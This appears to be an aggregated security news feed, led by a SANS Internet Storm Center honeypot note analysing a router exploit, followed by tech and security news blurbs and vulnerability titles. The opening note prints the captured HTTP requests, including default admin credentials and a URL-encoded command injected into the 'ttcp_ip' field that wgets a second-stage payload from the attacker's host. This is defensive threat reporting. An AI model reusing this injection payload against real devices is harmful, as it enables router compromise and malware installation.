Hackin9

Finally our honeypot did capture something that looks like it is responsible for the scanning activity we see:

The initial request, as discussed earlier, is:

GET /HNAP1/ HTTP/1.1
Host: [ip of host]:8080
 
The next request is where it gets interesting:
 
POST /[withheld].cgi HTTP/1.1
Host: [ip of host]:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://31.134.203.79:8080/
Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH    <- username: admin   password: &i1*@U$6xvcG (still trying to figure out the significance of this password)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 518
 
%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%73%75%62%6d%69%74%5f%74%79%70%65%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d%30&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%69%66%20%5b%20%21%20%2d%65%20%2e%4c%32%36%20%5d%3b%74%68%65%6e%20%77%67%65%74%20%68%74%74%70%3a%2f%2f%37%30%2e%31%38%34%2e%31%30%37%2e%32%34%33%3a%31%39%33%2f%30%52%78%2e%6d%69%64%3b%66%69%60&%53%74%61%72%74%45%50%49%3d%31
 
The decoded version of this request:
 
submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi`&StartEPI=1

So it looks like it will try to download a "second stage" from port 193 from the attacking router. I just got this request a couple minutes ago,  and haven't been able to retrieve the second stage yet, it may "go away" shortly after the attack. The ".L26" file appears to be a lock file to prevent multiple exploitation. 

I am withholding the full URL for now until I can figure out if there is a patch or if this is a public/known exploit.

 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Broadcom got a jump on Mobile World Congress this week, announcing two steps forward in its fledgling LTE silicon business. On Monday, the company introduced a turnkey solution for LTE smartphones to be priced under US$300. On Tuesday, it announced a test, on a live carrier network in Finland, of a high-end handset chip that can use so-called Category 6 LTE with speeds as high as 300Mbps (bits per second).
 
Cisco Systems reported another tough quarter on Wednesday, saying profits in its fiscal second quarter fell by more than half and revenue declined by nearly 8%.
 
U.S. Senator Rand Paul has delivered on promises to file a lawsuit challenging the U.S. National Security Agency's authority to engage in mass surveillance.
 
VMware will offer virtual desktop services for Google's Chromebooks, allowing them to run Windows applications on the pared-down laptops based on the Chrome OS.
 
Sitecore CMS 'xmlcontrol' Parameter Cross-Site Scripting Vulnerability
 
The Alliance for Wireless Power and the Power Matters Alliance joined forces this week, which should help hardware makers settle on a wireless charging standard for their devices.
 
Samsung Wednesday dropped a hint that its coming Galaxy S5 smartphone will have an updated user interface, possibly featuring simpler, flatter icons.
 
Verizon Wireless will sell the Nokia Lumia Icon smartphone starting Feb. 20 for $199.99 and a two-year contract.
 

The breach at Target that exposed payment card data and personal details for as many as 110 million of its customers may have begun with a simple malware-laced phishing e-mail sent to a refrigeration contractor that worked for the retailer, according to a report published Wednesday by KrebsOnSecurity.

The article builds off details unearthed last week by the same publication. Reporter Brian Krebs wrote that the hackers who penetrated Target's corporate network gained entry using authentication credentials stolen from a heating, ventilation, and air-conditioning (HVAC) subcontractor that did work for a variety of large retailers. The HVAC firm, Fazio Mechanical located in Sharpsburg, Pennsylvania, later issued a statement saying its data connection to Target's network was solely for purposes of electronic billing, contract submission, and project management.

Citing multiple people familiar with the ongoing investigation, Krebs said Wednesday that the Target credentials were obtained using an e-mail malware attack that began about two months before thieves began siphoning data for 40 million payment cards from Target's network-connected cash registers. Two of the sources said the malware was the Citadel password stealing program, but that detail hasn't been confirmed. Krebs went on to raise the possibility that the people who compromised the HVAC firm may not have done so with the intent of hacking Target and carrying out one of the largest data thefts in history. He also said that documentation that Target left in plain view on its website may have made the subsequent attack much easier to carry out. Krebs explained:

Read 1 remaining paragraphs | Comments


    






 
ImageMagick PSD Image File Handling Remote Buffer Overflow Vulnerability
 
Python 'sock_recvfrom_into()' Function Buffer Overflow Vulnerability
 
OpenStack Glance Information Disclosure Vulnerability
 
Windows' share of the smartphone market fell slightly in the December quarter as the biggest manufacturer supporting Microsoft's OS, Nokia, posted less-than-stellar sales numbers, IDC said today.
 
MIT scientists are writing computer programs that can control large teams of robots or networks of devices with different functions.
 
Zavio IP Cameras CVE-2013-2569 Security Bypass Vulnerability
 
Novell iPrint Client CVE-2013-1091 Buffer Overflow Vulnerability
 
To help organizations charged with providing the nationaposs financial, energy, health care and other critical systems better protect their information and physical assets from cyber attack, the Commerce Departmentaposs National ...
 
A new cybersecurity framework released Wednesday by U.S. President Barack Obama's administration aims to help operators of critical infrastructure develop comprehensive cybersecurity programs.
 
Enterprises will in the future get hosted unified communication services via mobile networks, according to telecom vendor Ericsson, which has developed the underlying platform to make that possible.
 
Toyota is recalling nearly 1.9 million Prius hybrid vehicles around the world in order to fix a software glitch that could damage transistors and cause a loss of power.
 
A group representing 22 of the world's largest banks is pushing for broad adoption in the U.S. of payment card technology called tokenization, citing shortcomings in the planned migration to the Europay MasterCard Visa smartcard standard over the next two years.
 
GNU glibc 'posix/fnmatch.c' Source File Denial of Service Vulnerability
 
Ruby Random Number Generation Local Denial Of Service Vulnerability
 
Mozilla has kicked off a project to show ads to new users of its Firefox browser, a move one analyst said is a search for revenue beyond the firm's overwhelming reliance on Google.
 
Twitter is reportedly working to redesign its profile pages, making them more visual, with bigger images, and looking a lot more like social rivals Facebook and Google+.
 
One of the many fraudulent SSL certificates, this one impersonating Facebook. Facebook apps won't be fooled by it, but other programs might.
Netcraft

Researchers have found dozens of fake certificates impersonating the secure sections of online banks, e-commerce sites, and social networks. Google, Facebook, iTunes, and even a POP e-mail server belonging to GoDaddy are a small sample of the services affected by the fraudulent credentials, which in some cases can allow attackers to read and modify encrypted traffic passing between end users and protected servers.

The secure sockets layer (SSL) certificates don't pose much of a threat to people using a popular Web browser to visit spoofed websites, because the credentials aren't digitally signed by a trusted certificate authority, researchers from Netcraft wrote in a blog post published Wednesday. They went on to say that people accessing sensitive websites with smartphone apps or other non-browser software may not be so lucky.

They cited several reports published in the past few years that detailed fatal weaknesses in popular software that made it possible for attackers to decrypt encrypted traffic and in some cases impersonate a cryptographically authenticated server. An October 2012 academic study, for instance, uncovered critical defects in a wide-range of applications running on computers and smartphones—some from banks such as Chase and services such as AOL—that failed to check the validity of SSL certificates. A separate study found that Android apps installed on as many as 185 million devices exposed end users' online banking and social networking credentials as well as e-mail and instant-messaging content because the programs used inadequate encryption protections. A more recent report from security firm IO Active uncovered similar weaknesses in apps written for Apple's iOS platform.

Read 5 remaining paragraphs | Comments


    






 
Pidgin 'sipmsg_parse_header()' Function Buffer Overflow Vulnerability
 
Libreswan 'ikev2parent_inI1outR1()' Function Remote Denial of Service Vulnerability
 
Technology is becoming a major player in romantic relationships, according to a report from the Pew Internet & American Life Project.
 
Apple's iTunes, software and services group generated almost as much revenue in 2013 as the Microsoft division responsible for licensing Windows to computer and smartphone makers, according to comparisons of the companies' financial statements.
 
The open source code that made Android a success is blunting Google's control over the mobile platform. Device makers like Amazon and Nokia are modifying -- or forking -- Android's source code to support their apps rather than Google's.
 
The storyline that a single point of failure allowed a sophisticated attacker to steal millions of card numbers from Target just doesn't hold up.
 
Adobe Systems released a security update for Shockwave Player in order to address two vulnerabilities that could allow attackers to remotely take control of affected systems.
 
If you think Yahoo has given up on search, think again. The company may have handed its back-end search operations to Microsoft, but CEO Marissa Mayer said there's work to be done on mobile devices, particularly around contextual search.
 
Hewlett-Packard said security and safety updates will be provided to all its server users after a controversy surrounding the company's decision to restrict access to firmware updates to server customers on warranty or covered by a support agreement.
 
The problems plaguing Bitcoin worsened Tuesday as online attacks on the digital currency's software affected two more exchanges.
 
Klout, a website that provides social media users with a measure of their "influence," is close to being acquired by a social marketing company for $100 million, according to published reports.
 
Technology is becoming a major player in romantic relationships, according to a report from the Pew Internet & American Life Project.
 
Smart cities aren't the stuff of science fiction. Governments -- in the heartland and on both coasts -- are using sensors, social media, big data and other technologies to provide better services to citizens.
 
Apple's iPhone shipments to China hit a record in the fourth quarter, but the company was pushed out of the top five smartphone makers in the country by strong demand for phones from local vendor Xiaomi.
 
The exclusive relationship of ICANN (the Internet Corporation for Assigned Names and Numbers) with the U.S. must end said the European Union's digital agenda chief on Wednesday.
 
Two years after launching its smart home remote monitoring service amid fanfare, Verizon Communications stopped offering the service to new customers. It plans a reboot later this year.
 
12-bay rack-mount systems from QNAP, Netgear, LenovoEMC, and Infortrend combine huge storage capacities, business-grade features, smooth setup, and easy administration
 
Linux Kernel 'pn_recvmsg()' Function Local Information Disclosure Vulnerability
 
Linux Kernel CVE-2013-7263 Multiple Information Disclosure Vulnerabilities
 

Posted by InfoSec News on Feb 12

http://houston.cbslocal.com/2014/02/08/police-teen-tricked-oklahoma-walmart-managers-out-of-nearly-30000/

CBS Houston
February 8, 2014

NORMAN, Okla. -- A 17-year-old scammed 3 Oklahoma Walmart stores out of nearly
$30,000, reports KFOR-TV.

Police say the teen, whose name is not being released because he is a juvenile,
conned the managers of those stores into thinking he was an employee.

At a Walmart in Moore, the teen "acted as if he...
 

Posted by InfoSec News on Feb 12

http://www.arabianbusiness.com/qatar-establish-cyber-security-committee-537614.html

By Courtney Trenwith
arabianbusiness.com
6 February 2014

Qatar has announced it will establish a national cyber security committee to
oversee the country’s fight against cyber crime and prevention strategies.

The committee, which has been approved by the Cabinet, also would be involved
in the protection of vital infrastructure and information, communication...
 

Posted by InfoSec News on Feb 12

http://www.stuff.co.nz/technology/digital-living/30015122/white-hat-hackers-to-gather-in-tokyo

stuff.co.nz
February 10 2014

Computer security experts from Japan and abroad will gather in Tokyo later
this month to discuss cutting-edge measures against cyberattacks.

The Code Blue conference will be held February 17 and 18, attended by
world-class computer security experts often called "white hat hackers".

It will be the first such...
 

Posted by InfoSec News on Feb 12

http://www.nytimes.com/2014/02/12/us/politics/spy-chief-says-snowden-took-advantage-of-perfect-storm-of-security-lapses.html

By DAVID E. SANGER and ERIC SCHMITT
The New York Times
FEB. 11, 2014

WASHINGTON -- The director of national intelligence acknowledged Tuesday
that nearly a year after the contractor Edward J. Snowden "scraped" highly
classified documents from the National Security Agency’s networks, the
technology was not...
 

Posted by InfoSec News on Feb 12

Forwarded from: BSidesLV Info <info (at) bsideslv org>

BSides Las Vegas is happy to announce that the CFP and CFM for our Proving
Ground track is now open.

Proving Ground is a Speaker Development Program, which teams new speakers
up with proven veteran speakers, as mentors.

If you would like to apply to our Proving Ground program as a new speaker,
the CFP form is here:...
 
Internet Storm Center Infocon Status